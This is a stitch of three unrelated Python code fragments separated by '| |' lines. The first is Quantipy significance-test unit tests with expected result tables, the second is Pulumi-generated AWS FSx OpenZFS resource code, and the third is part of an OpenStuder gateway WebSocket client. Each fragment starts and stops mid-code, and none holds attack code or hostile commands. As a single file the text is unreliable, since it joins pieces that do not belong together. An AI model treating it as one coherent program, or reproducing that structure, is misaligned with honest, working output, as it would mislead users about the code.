'stack': self.stack,
'iterators': {
'level': ['low']
}
}
})
mean_sig.add_method(name='DIM_means_test',
kwargs={'text': 'SIG (means)'})
self.stack.add_link(data_keys='testing', x=x, y=y,
views=mean_sig)
view = self.stack['testing']['no_filter'][x][y]['x|t.means.Dim.10|x[{1,2,3,4,5}]:|||DIM_means_test']
meta = self.stack['testing']['no_filter'][x][y]['x|t.means.Dim.10|x[{1,2,3,4,5}]:|||DIM_means_test'].meta()
sig_result = [['[5]', '[5]', '[1, 2, 5, 6, 7, 97]', '[5]', 'NONE', '[5]', '[5]', '[5]', 'NONE']]
meta_siglevel = 0.10
self.assertEqual(view.dataframe.replace(np.NaN, 'NONE').values.tolist(),
sig_result)
self.assertEqual(view.is_meanstest(), meta_siglevel)
def test_means_test_level_high_askia_unweighted_all_codes(self):
views = QuantipyViews(['counts', 'cbase'])
x = 'q5_1'
y = 'locality'
self.setup_stack(
views=views,
x=x,
y=y,
weights=None
)
means = ViewMapper(
template={
'method': QuantipyViews().descriptives,
'kwargs': {}
})
means.add_method(name='all',
kwargs={'text': '(all codes))',
'axis': 'x'})
self.stack.add_link(data_keys='testing', x=x, y=y,
views=means.subset('all'), weights=None)
mean_sig = ViewMapper(
template={
'method': QuantipyViews().coltests,
'kwargs': {
'metric': 'means',
'stack': self.stack,
'iterators': {
'level': ['high']
}
}
})
mean_sig.add_method(name='askia_means_test',
kwargs={'text': 'SIG (means)',
'mimic': 'askia'})
self.stack.add_link(data_keys='testing', x=x, y=y,
views=mean_sig, weights=None)
view = self.stack['testing']['no_filter'][x][y]['x|t.means.askia.01|x:|||askia_means_test']
meta = self.stack['testing']['no_filter'][x][y]['x|t.means.askia.01|x:|||askia_means_test'].meta()
sig_result = [['NONE', '[1]', '[1]', '[1, 2, 3]', '[1, 2, 3, 4]']]
meta_siglevel = 0.01
self.assertEqual(view.dataframe.replace(np.NaN, 'NONE').values.tolist(),
sig_result)
self.assertEqual(view.is_meanstest(), meta_siglevel)
''' props_test views: Tests that tests of proportion significance are yielding the correct results '''
def test_props_test_level_20_weighted(self):
views = QuantipyViews(['counts', 'cbase'])
x = 'q1'
y = 'locality'
self.setup_stack(
views=views,
x=x,
y=y,
weights='weight_a'
)
prop_sig = ViewMapper(
template={
'method': QuantipyViews().coltests,
'kwargs': {
'rel_to': 'y',
'metric': 'props',
'stack': self.stack,
'iterators': {
'level': [0.20]
}
}
})
prop_sig.add_method(name='DIM_props_test',
kwargs={'text': 'sig without overlap'})
self.stack.add_link(data_keys='testing', x=x, y=y,
views=prop_sig, weights='weight_a')
view = self.stack['testing']['no_filter'][x][y]['x|t.props.Dim.20|:|y|weight_a|DIM_props_test']
meta = self.stack['testing']['no_filter'][x][y]['x|t.props.Dim.20|:|y|weight_a|DIM_props_test'].meta()
sig_result = [['[2, 3, 4, 5]', '[4]', 'NONE', 'NONE', 'NONE'],
['NONE', 'NONE', 'NONE', 'NONE', 'NONE'],
['NONE', '[1, 4]', 'NONE', 'NONE', '[4]'],
['[2, 5]', 'NONE', '[5]', '[2, 5]', 'NONE'],
['NONE', 'NONE', 'NONE', 'NONE', 'NONE'],
['NONE', '[1]', '[1]', 'NONE', 'NONE'],
['NONE', 'NONE', 'NONE', '[1]', '[1]'],
['NONE', 'NONE', 'NONE', 'NONE', 'NONE'],
['NONE', 'NONE', 'NONE', 'NONE', 'NONE'],
['NONE', 'NONE', 'NONE', 'NONE', 'NONE'],
['[2, 3]', 'NONE', 'NONE', 'NONE', '[2, 3]'],
['[3]', '[1, 3]', 'NONE', '[3]', '[3]']]
meta_agg_text = 'sig without overlap'
meta_siglevel = 0.2
self.assertEqual(view.dataframe.replace(np.NaN, 'NONE').values.tolist(), sig_result)
self.assertEqual(meta['agg']['text'], meta_agg_text)
self.assertEqual(view.is_propstest(), meta_siglevel)
def test_props_test_level_5_ovlp_unweighted(self):
views = QuantipyViews(['counts', 'cbase'])
x = 'q5_1'
y = 'q3'
self.setup_stack(
views=views,
x=x,
y=y
)
prop_sig = ViewMapper(
template={
'method': QuantipyViews().coltests,
'kwargs': {
'rel_to': 'y',
'stack': self.stack,
'iterators': {
'level': ['mid']
}
}
})
prop_sig.add_method(name='DIM_props_test',
kwargs={'text': 'SIG (props)'})
self.stack.add_link(data_keys='testing', x=x, y=y,
views=prop_sig, weights=None)
view = self.stack['testing']['no_filter'][x][y]['x|t.props.Dim.05|:|y||DIM_props_test']
meta = self.stack['testing']['no_filter'][x][y]['x|t.props.Dim.05|:|y||DIM_props_test'].meta()
sig_result = [['[2, 3]', 'NONE', 'NONE', 'NONE', '[1, 2, 3, 4, 6, 7, 8, 97]', 'NONE', '[2, 3]', '[2, 3, 97]', 'NONE'],
['[3, 97]', '[1, 3, 97]', '[97]', '[3, 97]', '[1, 2, 3, 4, 7, 97]', '[1, 2, 3, 4, 7, 97]', '[1, 3, 97]', '[3, 97]', 'NONE'],
['[2, 3, 4, 8, 97]', '[8, 97]', '[2, 4, 8, 97]', '[97]', '[97]', '[97]', '[2, 4, 8, 97]', '[97]', 'NONE'],
['[3]', '[3]', 'NONE', '[1, 2, 3, 5, 6, 7, 97]', 'NONE', 'NONE', 'NONE', '[1, 2, 3, 4, 5, 6, 7, 97]', '[1, 2, 3, 7]'],
['[97]', '[97]', '[97]', '[97]', '[97]', '[97]', '[97]', '[97]', 'NONE'],
['NONE', '[1, 5, 7]', '[1, 5, 7]', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE', '[1, 2, 3, 4, 5, 6, 7, 8]'],
['[5, 6]', '[1, 5, 6, 7, 8]', '[1, 2, 4, 5, 6, 7, 8]', '[6]', 'NONE', 'NONE', '[6]', 'NONE', '[1, 2, 3, 4, 5, 6, 7, 8]']]
meta_agg_text = 'SIG (props)'
meta_siglevel = 0.05
self.assertEqual(view.dataframe.replace(np.NaN, 'NONE').values.tolist(), sig_result)
self.assertEqual(meta['agg']['text'], meta_agg_text)
self.assertEqual(view.is_propstest(), meta_siglevel)
def test_props_test_level_1_ovlp_weighted(self):
views = QuantipyViews(['counts', 'cbase'])
x = 'q9'
y = 'q8'
self.setup_stack(
views=views,
x=x,
y=y,
weights='weight_a'
)
prop_sig = ViewMapper(
template={
'method': QuantipyViews().coltests,
'kwargs': {
'rel_to': 'y',
'metric': 'props',
'stack': self.stack,
'iterators': {
'level': [0.01]
}
}
})
prop_sig.add_method(name='DIM_props_test',
kwargs={'text': 'SIG (props, strict)'})
self.stack.add_link(data_keys='testing', x=x, y=y,
views=prop_sig, weights='weight_a')
view = self.stack['testing']['no_filter'][x][y]['x|t.props.Dim.01|:|y|weight_a|DIM_props_test']
meta = self.stack['testing']['no_filter'][x][y]['x|t.props.Dim.01|:|y|weight_a|DIM_props_test'].meta()
sig_result = [['NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE'],
['NONE', 'NONE', '[1, 96]', '[96]', '[96]', 'NONE', 'NONE'],
['NONE', 'NONE', '[4]', 'NONE', 'NONE', 'NONE', 'NONE'],
['NONE', 'NONE', '[98]', 'NONE', 'NONE', 'NONE', 'NONE'],
['NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE'],
['NONE', '[3]', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE'],
['NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE']]
meta_agg_text = 'SIG (props, strict)'
meta_siglevel = 0.01
self.assertEqual(view.dataframe.replace(np.NaN, 'NONE').values.tolist(), sig_result)
self.assertEqual(meta['agg']['text'], meta_agg_text)
self.assertEqual(view.is_propstest(), meta_siglevel)
def test_props_means_tests_incl_total(self):
views = ['counts', 'mean']
x, y = 'q7_1', 'q8'
self.setup_stack(
views=views,
x=x,
y=y,
weights='weight_a'
)
tests = ViewMapper()
tests.make_template('coltests', iterators={'metric': ['props', 'means']})
tests.add_method(name='total_tests', kwargs={'test_total': True})
self.stack.add_link(data_keys='testing', x=x, y=y,
views=tests, weights='weight_a')
link = self.stack['testing']['no_filter'][x][y]
props_view = link['x|t.props.Dim.10+@|:||weight_a|total_tests']
means_view = link['x|t.means.Dim.10+@|x:||weight_a|total_tests']
props_results = [['NONE', "['@L', 1, 3, 4, 5, 96]", 'NONE', '[5]', "['@H']", 'NONE', 'NONE'],
['NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE'],
['NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE'],
['NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE'],
['[4]', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE'],
['NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE'],
['NONE', 'NONE', 'NONE', 'NONE', '[96]', 'NONE', 'NONE'],
['[5]', '[5]', 'NONE', '[5]', "['@H']", "['@L', 5]", "['@L', 1, 3, 4, 5]"],
['NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE']]
means_result = [['NONE', 'NONE', 'NONE', 'NONE', 'NONE', "['@L', 2]", 'NONE']]
self.assertEqual(props_view.dataframe.replace(np.NaN, 'NONE').values.tolist(),
props_results)
self.assertEqual(means_view.dataframe.replace(np.NaN, 'NONE').values.tolist(),
means_result)
def test_means_tests_code_exclusion_incl_total(self):
views = ['counts']
x, y = 'q7_1', 'q8'
self.setup_stack(
views=views,
x=x,
y=y,
weights='weight_a'
)
mean = ViewMapper()
mean.make_template('descriptives', iterators={'stats': ['mean']})
mean.add_method(name='excl. 6,8', kwargs={'exclude': [6, 8], 'axis': 'x'})
self.stack.add_link(data_keys='testing', x=x, y=y,
views=mean, weights=None)
tests = ViewMapper()
tests.make_template('coltests', iterators={'metric': ['means']})
tests.add_method(name='total_tests', kwargs={'test_total': True})
self.stack.add_link(data_keys='testing', x=x, y=y,
views=tests, weights=None)
link = self.stack['testing']['no_filter'][x][y]
means_view = link['x|t.means.Dim.10+@|x[{1,2,3,4,5,7,9}]:|||total_tests']
means_result = [["['@L', 98]", '[98]', '[98]', "['@L', 98]", '[98]', '[98]', "['@H']"]]
self.assertEqual(means_view.dataframe.replace(np.NaN, 'NONE').values.tolist(),
means_result)
def test_means_tests_code_exclusion_base_flags_incl_total(self):
views = ['counts']
x, y = 'q7_1', 'q8'
self.setup_stack(
views=views,
x=x,
y=y,
weights='weight_a'
)
mean = ViewMapper()
mean.make_template('descriptives', iterators={'stats': ['mean']})
mean.add_method(name='excl. 6,8', kwargs={'exclude': [6, 8],
'axis': 'x'})
self.stack.add_link(data_keys='testing', x=x, y=y,
views=mean, weights=None)
tests = ViewMapper()
tests.make_template('coltests', iterators={'metric': ['means']})
tests.add_method(name='total_tests_flags',
kwargs={'test_total': True,
'flag_bases': [30, 100]})
self.stack.add_link(data_keys='testing', x=x, y=y,
views=tests, weights=None)
link = self.stack['testing']['no_filter'][x][y]
means_view = link['x|t.means.Dim.10+@|x[{1,2,3,4,5,7,9}]:|||total_tests_flags']
means_result = [["['@L']", '*', 'NONE', "['@L']", 'NONE', '*', '**']]
self.assertEqual(means_view.dataframe.replace(np.NaN, 'NONE').values.tolist(),
means_result)
def test_props_blocknet_calc_incl_total(self):
from operator import add, sub
views = ['counts']
x, y = 'q7_1', 'q8'
self.setup_stack(
views=views,
x=x,
y=y,
weights='weight_a'
)
nets = ViewMapper()
nets.make_template('frequency')
nets_def = [{'Z': [1, 2, 3], 'expand': 'after',
'text': {'en-GB': 'some text1'}},
{'A': [4, 5],
'text': {'en-GB': 'some text2'}},
{'F': [6, 7, 8], 'expand': 'before',
'text': {'en-GB': 'some text3'}}]
calc = {'my_calc': ('Z', sub, 'F')}
nets.add_method(name='blocknet',
kwargs={'logic': nets_def,
'axis': 'x',
'complete': True,
'calc': calc})
self.stack.add_link(data_keys='testing', x=x, y=y,
views=nets, weights='weight_a')
tests = ViewMapper()
tests.make_template('coltests', iterators={'metric': ['props']})
tests.add_method(name='total_tests_blocks',
kwargs={'test_total': True})
self.stack.add_link(data_keys='testing', x=x, y=y,
views=tests, weights='weight_a')
link = self.stack['testing']['no_filter'][x][y]
nets_view = link['x|t.props.Dim.10+@|x[{1,2,3}+],x[{4,5}],x[+{6,7,8}],x[{1,2,3}-{6,7,8}]*:||weight_a|total_tests_blocks']
nets_result = [["['@H']", 'NONE', '[1]', 'NONE', 'NONE', 'NONE', 'NONE'],
['NONE', "['@L', 1, 3, 4, 5, 96]", 'NONE', '[5]', "['@H']", 'NONE', 'NONE'],
['NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE'],
['NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE'],
['NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE'],
['[4]', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE'],
['[4]', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE'],
['NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE'],
['NONE', 'NONE', 'NONE', 'NONE', '[96]', 'NONE', 'NONE'],
['[5]', '[5]', 'NONE', '[5]', "['@H']", "['@L', 5]", "['@L', 1, 3, 4, 5]"],
['NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE'],
['NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE'],
['NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE']]
self.assertEqual(nets_view.dataframe.replace(np.NaN, 'NONE').values.tolist(),
nets_result)
def test_props_changed_meta_nets_incl_total(self):
| |
None,
weekly_maintenance_start_time: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = OpenZfsFileSystemArgs.__new__(OpenZfsFileSystemArgs)
__props__.__dict__["automatic_backup_retention_days"] = automatic_backup_retention_days
__props__.__dict__["backup_id"] = backup_id
__props__.__dict__["copy_tags_to_backups"] = copy_tags_to_backups
__props__.__dict__["copy_tags_to_volumes"] = copy_tags_to_volumes
__props__.__dict__["daily_automatic_backup_start_time"] = daily_automatic_backup_start_time
if deployment_type is None and not opts.urn:
raise TypeError("Missing required property 'deployment_type'")
__props__.__dict__["deployment_type"] = deployment_type
__props__.__dict__["disk_iops_configuration"] = disk_iops_configuration
__props__.__dict__["kms_key_id"] = kms_key_id
__props__.__dict__["root_volume_configuration"] = root_volume_configuration
__props__.__dict__["security_group_ids"] = security_group_ids
__props__.__dict__["storage_capacity"] = storage_capacity
__props__.__dict__["storage_type"] = storage_type
if subnet_ids is None and not opts.urn:
raise TypeError("Missing required property 'subnet_ids'")
__props__.__dict__["subnet_ids"] = subnet_ids
__props__.__dict__["tags"] = tags
__props__.__dict__["tags_all"] = tags_all
if throughput_capacity is None and not opts.urn:
raise TypeError("Missing required property 'throughput_capacity'")
__props__.__dict__["throughput_capacity"] = throughput_capacity
__props__.__dict__["weekly_maintenance_start_time"] = weekly_maintenance_start_time
__props__.__dict__["arn"] = None
__props__.__dict__["dns_name"] = None
__props__.__dict__["network_interface_ids"] = None
__props__.__dict__["owner_id"] = None
__props__.__dict__["root_volume_id"] = None
__props__.__dict__["vpc_id"] = None
super(OpenZfsFileSystem, __self__).__init__(
'aws:fsx/openZfsFileSystem:OpenZfsFileSystem',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
arn: Optional[pulumi.Input[str]] = None,
automatic_backup_retention_days: Optional[pulumi.Input[int]] = None,
backup_id: Optional[pulumi.Input[str]] = None,
copy_tags_to_backups: Optional[pulumi.Input[bool]] = None,
copy_tags_to_volumes: Optional[pulumi.Input[bool]] = None,
daily_automatic_backup_start_time: Optional[pulumi.Input[str]] = None,
deployment_type: Optional[pulumi.Input[str]] = None,
disk_iops_configuration: Optional[pulumi.Input[pulumi.InputType['OpenZfsFileSystemDiskIopsConfigurationArgs']]] = None,
dns_name: Optional[pulumi.Input[str]] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
network_interface_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
owner_id: Optional[pulumi.Input[str]] = None,
root_volume_configuration: Optional[pulumi.Input[pulumi.InputType['OpenZfsFileSystemRootVolumeConfigurationArgs']]] = None,
root_volume_id: Optional[pulumi.Input[str]] = None,
security_group_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
storage_capacity: Optional[pulumi.Input[int]] = None,
storage_type: Optional[pulumi.Input[str]] = None,
subnet_ids: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
throughput_capacity: Optional[pulumi.Input[int]] = None,
vpc_id: Optional[pulumi.Input[str]] = None,
weekly_maintenance_start_time: Optional[pulumi.Input[str]] = None) -> 'OpenZfsFileSystem':
"""
Get an existing OpenZfsFileSystem resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] arn: Amazon Resource Name of the file system.
:param pulumi.Input[int] automatic_backup_retention_days: The number of days to retain automatic backups. Setting this to 0 disables automatic backups. You can retain automatic backups for a maximum of 90 days.
:param pulumi.Input[str] backup_id: The ID of the source backup to create the filesystem from.
:param pulumi.Input[bool] copy_tags_to_backups: A boolean flag indicating whether tags for the file system should be copied to backups. The default value is false.
:param pulumi.Input[bool] copy_tags_to_volumes: A boolean flag indicating whether tags for the file system should be copied to snapshots. The default value is false.
:param pulumi.Input[str] daily_automatic_backup_start_time: A recurring daily time, in the format HH:MM. HH is the zero-padded hour of the day (0-23), and MM is the zero-padded minute of the hour. For example, 05:00 specifies 5 AM daily. Requires `automatic_backup_retention_days` to be set.
:param pulumi.Input[str] deployment_type: - The filesystem deployment type. Only `SINGLE_AZ_1` is supported.
:param pulumi.Input[pulumi.InputType['OpenZfsFileSystemDiskIopsConfigurationArgs']] disk_iops_configuration: The SSD IOPS configuration for the Amazon FSx for OpenZFS file system. See Disk Iops Configuration Below.
:param pulumi.Input[str] dns_name: DNS name for the file system, e.g., `fs-12345678.fsx.us-west-2.amazonaws.com`
:param pulumi.Input[str] kms_key_id: ARN for the KMS Key to encrypt the file system at rest, Defaults to an AWS managed KMS Key.
:param pulumi.Input[Sequence[pulumi.Input[str]]] network_interface_ids: Set of Elastic Network Interface identifiers from which the file system is accessible The first network interface returned is the primary network interface.
:param pulumi.Input[str] owner_id: AWS account identifier that created the file system.
:param pulumi.Input[pulumi.InputType['OpenZfsFileSystemRootVolumeConfigurationArgs']] root_volume_configuration: The configuration for the root volume of the file system. All other volumes are children or the root volume. See Root Volume Configuration Below.
:param pulumi.Input[str] root_volume_id: Identifier of the root volume, e.g., `fsvol-12345678`
:param pulumi.Input[Sequence[pulumi.Input[str]]] security_group_ids: A list of IDs for the security groups that apply to the specified network interfaces created for file system access. These security groups will apply to all network interfaces.
:param pulumi.Input[int] storage_capacity: The storage capacity (GiB) of the file system. Valid values between `64` and `524288`.
:param pulumi.Input[str] storage_type: The filesystem storage type. Only `SSD` is supported.
:param pulumi.Input[str] subnet_ids: A list of IDs for the subnets that the file system will be accessible from. Exactly 1 subnet need to be provided.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the file system. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block).
:param pulumi.Input[int] throughput_capacity: Throughput (megabytes per second) of the file system in power of 2 increments. Minimum of `64` and maximum of `4096`.
:param pulumi.Input[str] vpc_id: Identifier of the Virtual Private Cloud for the file system.
:param pulumi.Input[str] weekly_maintenance_start_time: The preferred start time (in `d:HH:MM` format) to perform weekly maintenance, in the UTC time zone.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _OpenZfsFileSystemState.__new__(_OpenZfsFileSystemState)
__props__.__dict__["arn"] = arn
__props__.__dict__["automatic_backup_retention_days"] = automatic_backup_retention_days
__props__.__dict__["backup_id"] = backup_id
__props__.__dict__["copy_tags_to_backups"] = copy_tags_to_backups
__props__.__dict__["copy_tags_to_volumes"] = copy_tags_to_volumes
__props__.__dict__["daily_automatic_backup_start_time"] = daily_automatic_backup_start_time
__props__.__dict__["deployment_type"] = deployment_type
__props__.__dict__["disk_iops_configuration"] = disk_iops_configuration
__props__.__dict__["dns_name"] = dns_name
__props__.__dict__["kms_key_id"] = kms_key_id
__props__.__dict__["network_interface_ids"] = network_interface_ids
__props__.__dict__["owner_id"] = owner_id
__props__.__dict__["root_volume_configuration"] = root_volume_configuration
__props__.__dict__["root_volume_id"] = root_volume_id
__props__.__dict__["security_group_ids"] = security_group_ids
__props__.__dict__["storage_capacity"] = storage_capacity
__props__.__dict__["storage_type"] = storage_type
__props__.__dict__["subnet_ids"] = subnet_ids
__props__.__dict__["tags"] = tags
__props__.__dict__["tags_all"] = tags_all
__props__.__dict__["throughput_capacity"] = throughput_capacity
__props__.__dict__["vpc_id"] = vpc_id
__props__.__dict__["weekly_maintenance_start_time"] = weekly_maintenance_start_time
return OpenZfsFileSystem(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def arn(self) -> pulumi.Output[str]:
"""
Amazon Resource Name of the file system.
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter(name="automaticBackupRetentionDays")
def automatic_backup_retention_days(self) -> pulumi.Output[Optional[int]]:
"""
The number of days to retain automatic backups. Setting this to 0 disables automatic backups. You can retain automatic backups for a maximum of 90 days.
"""
return pulumi.get(self, "automatic_backup_retention_days")
@property
@pulumi.getter(name="backupId")
def backup_id(self) -> pulumi.Output[Optional[str]]:
"""
The ID of the source backup to create the filesystem from.
"""
return pulumi.get(self, "backup_id")
@property
@pulumi.getter(name="copyTagsToBackups")
def copy_tags_to_backups(self) -> pulumi.Output[Optional[bool]]:
"""
A boolean flag indicating whether tags for the file system should be copied to backups. The default value is false.
"""
return pulumi.get(self, "copy_tags_to_backups")
@property
@pulumi.getter(name="copyTagsToVolumes")
def copy_tags_to_volumes(self) -> pulumi.Output[Optional[bool]]:
"""
A boolean flag indicating whether tags for the file system should be copied to snapshots. The default value is false.
"""
return pulumi.get(self, "copy_tags_to_volumes")
@property
@pulumi.getter(name="dailyAutomaticBackupStartTime")
def daily_automatic_backup_start_time(self) -> pulumi.Output[str]:
"""
A recurring daily time, in the format HH:MM. HH is the zero-padded hour of the day (0-23), and MM is the zero-padded minute of the hour. For example, 05:00 specifies 5 AM daily. Requires `automatic_backup_retention_days` to be set.
"""
return pulumi.get(self, "daily_automatic_backup_start_time")
@property
@pulumi.getter(name="deploymentType")
def deployment_type(self) -> pulumi.Output[str]:
"""
- The filesystem deployment type. Only `SINGLE_AZ_1` is supported.
"""
return pulumi.get(self, "deployment_type")
@property
@pulumi.getter(name="diskIopsConfiguration")
def disk_iops_configuration(self) -> pulumi.Output['outputs.OpenZfsFileSystemDiskIopsConfiguration']:
"""
The SSD IOPS configuration for the Amazon FSx for OpenZFS file system. See Disk Iops Configuration Below.
"""
return pulumi.get(self, "disk_iops_configuration")
@property
@pulumi.getter(name="dnsName")
def dns_name(self) -> pulumi.Output[str]:
"""
DNS name for the file system, e.g., `fs-12345678.fsx.us-west-2.amazonaws.com`
"""
return pulumi.get(self, "dns_name")
@property
@pulumi.getter(name="kmsKeyId")
def kms_key_id(self) -> pulumi.Output[str]:
"""
ARN for the KMS Key to encrypt the file system at rest, Defaults to an AWS managed KMS Key.
"""
return pulumi.get(self, "kms_key_id")
@property
@pulumi.getter(name="networkInterfaceIds")
def network_interface_ids(self) -> pulumi.Output[Sequence[str]]:
"""
Set of Elastic Network Interface identifiers from which the file system is accessible The first network interface returned is the primary network interface.
"""
return pulumi.get(self, "network_interface_ids")
@property
@pulumi.getter(name="ownerId")
def owner_id(self) -> pulumi.Output[str]:
"""
AWS account identifier that created the file system.
"""
return pulumi.get(self, "owner_id")
@property
@pulumi.getter(name="rootVolumeConfiguration")
def root_volume_configuration(self) -> pulumi.Output['outputs.OpenZfsFileSystemRootVolumeConfiguration']:
"""
The configuration for the root volume of the file system. All other volumes are children or the root volume. See Root Volume Configuration Below.
"""
return pulumi.get(self, "root_volume_configuration")
@property
@pulumi.getter(name="rootVolumeId")
def root_volume_id(self) -> pulumi.Output[str]:
"""
Identifier of the root volume, e.g., `fsvol-12345678`
"""
return pulumi.get(self, "root_volume_id")
@property
@pulumi.getter(name="securityGroupIds")
def security_group_ids(self) | |
four parameters: 1: Status of the find operation, 2: the searched ID (including wildcard character), 3: the number of properties found,
4: List of the property IDs.
"""
self.on_property_read: Optional[Callable[[str, str, Optional[any]], None]] = None
"""
Called when the property read operation started using read_property() has completed on the gateway.
The callback takes three parameters: 1: Status of the read operation, 2: the ID of the property read, 3: the value read.
"""
self.on_properties_read: Optional[Callable[[List[SIPropertyReadResult]], None]] = None
"""
Called when the multiple properties read operation started using read_properties() has completed on the gateway.
The callback takes one parameters: 1: List of all results of the operation.
"""
self.on_property_written: Optional[Callable[[str, str], None]] = None
"""
Called when the property write operation started using write_property() has completed on the gateway.
The callback takes two parameters: 1: Status of the write operation, 2: the ID of the property written.
"""
self.on_property_subscribed: Optional[Callable[[str, str], None]] = None
"""
Called when the gateway returned the status of the property subscription requested using the subscribe_to_property() method.
The callback takes two parameters: 1: The status of the subscription, 2: The ID of the property.
"""
self.on_properties_subscribed: Optional[Callable[[List[SIPropertySubscriptionResult]], None]] = None
"""
Called when the gateway returned the status of the properties subscription requested using the subscribe_to_properties() method.
The callback takes one parameter: 1: List of statuses of individual subscription requests.
"""
self.on_property_unsubscribed: Optional[Callable[[str, str], None]] = None
"""
Called when the gateway returned the status of the property unsubscription requested using the unsubscribe_from_property() method.
The callback takes two parameters: 1: The status of the unsubscription, 2: The ID of the property.
"""
self.on_properties_unsubscribed: Optional[Callable[[List[SIPropertySubscriptionResult]], None]] = None
"""
Called when the gateway returned the status of the properties unsubscription requested using the unsubscribe_from_properties() method.
The callback takes one parameter: 1: List of statuses of individual unsubscription requests.
"""
self.on_property_updated: Optional[Callable[[str, any], None]] = None
"""
This callback is called whenever the gateway send a property update.
The callback takes two parameters: 1: the ID of the property that has updated, 2: the actual value.
"""
self.on_datalog_properties_read: Optional[Callable[[SIStatus, List[str]], None]] = None
"""
Called when the datalog property list operation started using read_datalog_properties() has completed on the gateway.
The callback takes 2 parameters: 1: Status of the operation, 2: List of the IDs of the properties for whom data is available in the data log.
"""
self.on_datalog_read_csv: Optional[Callable[[str, str, int, str], None]] = None
"""
Called when the datalog read operation started using read_datalog() has completed on the gateway. This version of the callback returns the data in CSV format suitable to
be written to a file.
The callback takes four parameters: 1: Status of the operation, 2: ID of the property, 3: number of entries, 4: properties data in CSV format whereas the first column is
the date and time in ISO 8601 extended format and the second column contains the actual values.
"""
self.on_device_message: Optional[Callable[[SIDeviceMessage], None]] = None
"""
This callback is called whenever the gateway send a device message indication.
The callback takes one parameter, the device message object.
"""
self.on_messages_read: Optional[Callable[[str, Optional[int], List[SIDeviceMessage]], None]] = None
"""
Called when the gateway returned the status of the read messages operation using the read_messages() method.
The callback takes three parameters: 1: the status of the operation, 2: the number of messages retrieved, 3: the list of retrieved messages.
"""
def connect(self, host: str, port: int = 1987, user: str = None, password: str = None, background: bool = True) -> None:
"""
Establishes the WebSocket connection to the OpenStuder gateway and executes the user authorization process once the connection has been established in the background. This
method returns immediately and does not block the current thread.
The status of the connection attempt is reported either by the on_connected() callback on success or the on_error() callback if the connection could not be established
or the authorisation for the given user was rejected by the gateway.
:param host: Hostname or IP address of the OpenStuder gateway to connect to.
:param port: TCP port used for the connection to the OpenStuder gateway, defaults to 1987.
:param user: Username send to the gateway used for authorization.
:param password: Password send to the gateway used for authorization.
:param background: If true, the handling of the WebSocket connection is done in the background, if false the current thread is took over.
:raises SIProtocolError: If there was an error initiating the WebSocket connection.
"""
# Ensure that the client is in the DISCONNECTED state.
self.__ensure_in_state(SIConnectionState.DISCONNECTED)
# Save parameter for later use.
self.__user = user
self.__password = password
# Connect to WebSocket server.
self.__state = SIConnectionState.CONNECTING
self.__ws = websocket.WebSocketApp('ws://{host}:{port}'.format(host=host, port=port),
on_open=self.__on_open,
on_message=self.__on_message,
on_error=self.__on_error,
on_close=self.__on_close
)
# TODO: Start connection timeout.
# If background mode is selected, start a daemon thread for the connection handling, otherwise take over current thread.
if background:
self.__thread = Thread(target=self.__ws.run_forever)
self.__thread.setDaemon(True)
self.__thread.start()
else:
self.__ws.run_forever()
def set_callbacks(self, callbacks: SIAsyncGatewayClientCallbacks) -> None:
"""
Configures the client to use all callbacks of the passed abstract client callback class. Using this you can set all callbacks to be called on the given object and avoid
having to set each callback individually.
:param callbacks: Object derived from SIAsyncGatewayClientCallbacks to be used for all callbacks.
"""
if isinstance(callbacks, SIAsyncGatewayClientCallbacks):
self.on_connected = callbacks.on_connected
self.on_disconnected = callbacks.on_disconnected
self.on_error = callbacks.on_error
self.on_enumerated = callbacks.on_enumerated
self.on_description = callbacks.on_description
